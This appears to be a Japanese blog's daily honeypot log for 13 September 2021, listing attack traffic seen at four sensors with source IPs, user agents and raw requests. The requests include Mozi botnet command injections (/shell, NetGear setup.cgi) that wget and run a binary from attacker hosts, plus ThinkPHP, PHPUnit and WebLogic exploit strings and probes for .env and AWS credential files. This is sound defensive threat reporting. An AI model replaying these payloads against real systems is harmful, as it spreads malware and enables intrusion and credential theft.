コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/09/13 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/09/13分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
UniversityProjectによるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws
Location:US

Drupal脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//172[.]43[.]38[.]215:54765/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws
Location:UK

Drupal脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
Nmap Scripting Engineによるスキャン行為
を確認しました。

Location:SG

Arcadyanルータの脆弱性(CVE-2021-20090)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Darkによるスキャン行為
polaris botnetによるスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

アクセス数推移

JP:総アクセス数:55 (前日比:-92)
US:総アクセス数:58 (前日比:-23)
UK:総アクセス数:93 (前日比:+60)
SG:総アクセス数:70 (前日比:-170)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.223.101.7 United States
1 35.193.149.147 United States
1 45.95.147.10 Netherlands
1 45.144.227.10 Netherlands
11 45.146.164.110 Russia
1 50.21.179.186 United States
1 58.44.253.193 China
1 65.21.232.95 Germany
1 91.241.19.157 Russia
1 104.207.130.247 United States
1 104.248.167.142 United States
2 135.125.244.48 France
6 135.125.246.110 France
2 139.59.85.129 Singapore
1 142.93.146.198 United States
1 143.244.169.254 United States
8 159.203.33.94 United States
1 164.90.201.16 United States
1 175.170.19.169 China
1 192.241.208.96 United States
1 192.241.213.168 United States
1 192.241.220.153 United States
1 193.242.145.12 Russia
2 196.77.108.57 Morocco
1 203.204.232.59 Taiwan
1 205.185.116.29 United States
1 209.17.96.90 United States
1 219.155.225.218 China
2 222.186.19.235 China

UserAgent一覧

件数 UserAgent
7 -
1 Hello, world
1 Mozilla/5.0
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Safari/528.8
1 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
23 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 UniversityProject/2.9
3 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 \x03
1 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
24 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /adminer.php HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175[.]170[.]19[.]169:35272/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sip5b92450a50ade0e61b57f6de3b82ac1d/e4e2e9eea1acefa1b4b8e0e5b0e3b3e7e2b6b5 HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.48.249.25 United States
1 15.228.89.86 United States
2 37.59.42.25 France
2 38.68.46.223 United States
1 45.89.183.67 Italy
1 45.95.147.10 Netherlands
11 45.146.164.110 Russia
1 52.224.245.245 United States
1 66.240.205.34 United States
2 94.232.43.177 Russia
1 113.69.130.69 China
1 124.118.72.16 China
1 125.127.153.32 China
3 135.125.217.54 France
2 139.59.85.129 Singapore
1 139.162.145.250 Netherlands
1 143.244.169.254 United States
1 180.124.126.43 China
1 183.17.225.167 China
1 185.153.196.69 Russia
1 185.153.196.70 Russia
1 185.220.100.242 Germany
6 185.233.0.32 Russia
1 192.241.214.75 United States
1 192.241.214.114 United States
1 192.241.215.111 United States
1 193.242.145.12 Russia
1 205.185.121.47 United States
1 209.17.96.66 United States
1 209.97.181.15 United States
1 209.141.33.44 United States
1 209.141.46.56 United States
1 209.141.48.211 United States
1 222.141.173.83 China
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
12 -
3 Hello, World
1 Hello, world
6 Mozilla 5/0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.0 Safari/532.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
3 Mozilla/5.0 zgrab/0.x
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
2 Python/3.7 aiohttp/3.7.4.post0
2 curl/7.61.1
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 Gh0st\xad
4 \x03
3 \x16\x03\x01
1 \x16\x03\x01\x01\xfb\x01
9 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /adminer.php HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//172[.]43[.]38[.]215:54765/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 45.79.191.232 United States
11 45.146.164.110 Russia
1 66.240.205.34 United States
1 76.98.82.31 United States
1 115.54.70.241 China
1 139.162.145.250 Netherlands
65 140.238.154.239 United States
1 142.93.146.198 United States
1 164.90.181.35 United States
1 192.241.210.106 United States
1 192.241.212.182 United States
1 192.241.221.237 United States
1 193.105.228.135 Italy
1 193.242.145.12 Russia
1 205.185.116.29 United States
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
4 -
1 Mozilla/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Ubuntu/11.10 Chromium/17.0.963.65 Chrome/17.0.963.65 Safari/535.11
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
65 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
3 Mozilla/5.0 zgrab/0.x
1 \"Mozilla/5.0
2 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
2 \x16\x03\x01
1 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/info/config HTTP/1.1
1 GET /adminer.php HTTP/1.1
1 GET /api/spec.json HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /console/css/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/images/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /nmaplowercheck1631392546 HTTP/1.1
1 GET /opc/v1/identity HTTP/1.1
1 GET /opc/v1/instance HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sip3ff372af030bf911295c76e7aa75aaf1/e4e2e9eea1acefa1b4b8e0e5b0e3b3e7e2b6b5 HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spec/api.json HTTP/1.1
1 GET /ui HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /actuator HTTP/1.1
1 HEAD /actuator/auditevents HTTP/1.1
1 HEAD /actuator/beans HTTP/1.1
1 HEAD /actuator/conditions HTTP/1.1
1 HEAD /actuator/configprops HTTP/1.1
1 HEAD /actuator/env HTTP/1.1
1 HEAD /actuator/health HTTP/1.1
1 HEAD /actuator/heapdump HTTP/1.1
1 HEAD /actuator/httptrace HTTP/1.1
1 HEAD /actuator/hystrix.stream HTTP/1.1
1 HEAD /actuator/info HTTP/1.1
1 HEAD /actuator/jolokia HTTP/1.1
1 HEAD /actuator/loggers HTTP/1.1
1 HEAD /actuator/mappings HTTP/1.1
1 HEAD /actuator/metrics HTTP/1.1
1 HEAD /actuator/scheduledtasks HTTP/1.1
1 HEAD /actuator/threaddump HTTP/1.1
1 HEAD /auditevents HTTP/1.1
1 HEAD /autoconfig HTTP/1.1
1 HEAD /beans HTTP/1.1
1 HEAD /cloudfoundryapplication HTTP/1.1
1 HEAD /configprops HTTP/1.1
1 HEAD /dump HTTP/1.1
1 HEAD /env HTTP/1.1
1 HEAD /health HTTP/1.1
1 HEAD /heapdump HTTP/1.1
1 HEAD /hystrix.stream HTTP/1.1
1 HEAD /info HTTP/1.1
1 HEAD /jolokia HTTP/1.1
1 HEAD /loggers HTTP/1.1
1 HEAD /mappings HTTP/1.1
1 HEAD /metrics HTTP/1.1
1 HEAD /threaddump HTTP/1.1
1 HEAD /trace HTTP/1.1
1 LCIW / HTTP/1.1
11 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /sdk HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PROPFIND / HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
15 13.212.136.70 United States
7 38.68.47.235 United States
1 45.87.62.140 United States
1 45.95.147.10 Netherlands
11 45.146.164.110 Russia
1 50.198.14.142 United States
3 51.158.78.179 France
1 59.99.140.50 India
6 95.214.52.219 Poland
1 103.28.70.137 United States
1 103.217.247.131 India
3 135.125.217.54 France
1 142.93.146.198 United States
2 143.110.220.80 United States
1 143.244.169.254 United States
1 164.90.201.16 United States
1 178.62.108.243 United States
1 182.123.253.38 China
1 192.241.210.129 United States
1 192.241.215.127 United States
4 193.56.29.183 United Kingdom
1 193.242.145.12 Russia
1 205.185.116.29 United States
1 209.17.96.202 United States
1 209.141.48.211 United States
2 222.186.19.235 China

UserAgent一覧

件数 UserAgent
20 -
1 Dark
1 Mozilla/5.0
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 OPR/54.0.2952.51
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2
7 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
11 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
1 polaris botnet
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01
1 \x16\x03\x01\x01\xfb\x01
7 \x16\x03\x01\x02
1 CONNECT www[.]bing[.]com:443 HTTP/1.1
1 GET /.aws HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
11 GET /.env HTTP/1.1
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //myadmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //pma/scripts/setup.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /adminer.php HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /dump1090-fa/ HTTP/1.1
1 GET /dump1090.php HTTP/1.1
1 GET /dump1090/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /muieblackcat HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]123[.]253[.]38:52986/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sip5b92450a50ade0e61b57f6de3b82ac1d/e4e2e9eea1acefa1b4b8e0e5b0e3b3e7e2b6b5 HTTP/1.1
1 GET /skyaware/ HTTP/1.1
1 GET /skyaware978/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /tar1090/ HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /virtualRadar/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
1 POST /images/..%2fapply_abstract.cgi HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//maryblack[.]xyz/701fb31a5a40ae9fee934e57000902095285c1d2ce4e4547c90def7bae1aeafe0ca5ce75f93b5562768e4edbadb6124a78af7bf96031bfb5f62aec4bec02b7fd6ec25ed268afdb79f69348a8ce3673cc1fe43722eee2cbba7452f026cc776a21 HTTP/1.1
1 get id